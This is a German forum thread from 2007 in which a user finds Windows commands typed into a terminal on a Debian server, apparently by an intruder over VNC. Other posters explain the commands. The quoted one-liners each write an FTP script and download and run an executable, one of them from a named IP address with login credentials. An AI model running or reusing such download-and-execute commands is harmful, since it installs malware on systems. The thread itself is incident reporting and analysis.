Seite 1 von 1

Virus? wtf...

Verfasst: Di Apr 03, 2007 4:10 pm
von Arkard
Hab heute meinen Linux Server neu aufgesetzt (Debian Testing). Und als ich so im Terminal (kein putty, über VNC viewer) n bissi Software installiert hab (nix besonderes, nur apache, php, ftp, wine, etc.) hat sich plötzlich mein Terminal verselbstständigt.

Im Terminal sind ohne, dass ich etwas getippt hab Befehle aufgetaucht. Hier die Befehle:

Code: Alles auswählen

%systemroot%ßsystem32ßcmd.exe
cmd /c echo open 85.181.199.114 10090 >> ik &echo user james 12198841 >> ik &echo get 7.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &7.exe &exit
Habs erst ganz witzig gefunden, dass der n paar win Befehle ausführen will und dachte dass liegt vielleicht an meinem Windows Rechner. Also hab ich mal meinen PC gescannt und den VNC viewer geschlossen. Derweil bin ich zocken gegangen und nach einer Weile hör ich plötzlich den Server beepen. Ich geh also zum Windows Rechner, starte den viewer und schon wieder ist ein Terminal Fenster offen. Hab gleich mal die History angeschaut und siehe da:

Code: Alles auswählen

%systemroot%ßsystem32ßcmd.exe
cmd /c echo open 0.0.0.0 25969 >> ik &echo user zXvS zXvS >> ik &echo get 9.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &9.exe &exit
Der Inhalt der ik Datei liest sich folgendermaßen:

Code: Alles auswählen

user zXvS zXvS
get 9.exe
bye
Was, bitteschön, ist da los? Windows Virus der unter wine läuft, oder doch ein Virus der von einem meiner Windows PCs aufmuckt?

Hab auch gleich mal probiert auf den FTP zu verbinden (James//12198841), nach der Authentifizierung bricht aber die Verbindung ab.

Verfasst: Mi Apr 04, 2007 9:11 am
von retroK
Das sieht alles sehr mysteriös aus!
Hast du mittlerweile was rausgefunden?

Verfasst: Mi Apr 04, 2007 6:27 pm
von Katana
In der Tat.

Unter Win würde er die cmd.exe öffnen (funktioniert also nicht unter Win9x :)), dann folgendes in die Datei "ik" schreiben:

Code: Alles auswählen

open 0.0.0.0 25969
user zXvS zXvS
get 9.exe
bye
dann würde er das ftp Kommando aufrufen und die in die Datei ik geschrieben Befehle ausführen.
Dann die Datei "ik" wieder löschen, die 9.exe ausführen und die cmd.exe wieder schließen.

Beim ersten Versuch verbindet er sich als "user james 12198841" mit dem Server 85.181.199.114:10090.

Frage mich, wohin er mit 0.0.0.0 will.

Denke mal, dass du die Software aus den Debian-Quellen installiert hast, per APT. Daher sollte also nichts komisches kommen. Wundere mich allerdings stark, was ein Windows Wurm/Virus (wobei mir das irgendwie nach "Scriptkiddie Adware" aussieht) auf 'ner Linux Kiste macht.

Verfasst: Fr Apr 06, 2007 9:32 am
von Arkard
Als ich heute wieder mal nach dem Server gesehen hab war wieder was da^^. 2 Dateibrowser von wine und das Fenster zum Torrents öffnen von µTorrent. Als Dateiname stand im µTorrent Fenster wieder die cmd.exe.

Verfasst: Fr Apr 06, 2007 2:24 pm
von DarkZero
Katana hat geschrieben:Wundere mich allerdings stark, was ein Windows Wurm/Virus (wobei mir das irgendwie nach "Scriptkiddie
Adware" aussieht) auf 'ner Linux Kiste macht.
Naja, es gibt Viren, die laufen unter WINE. Mit WINE kann man sogar MS vormachen, man hätte ein legales Windows. Ist kein Scherz, hat bei mir schon funktioniert.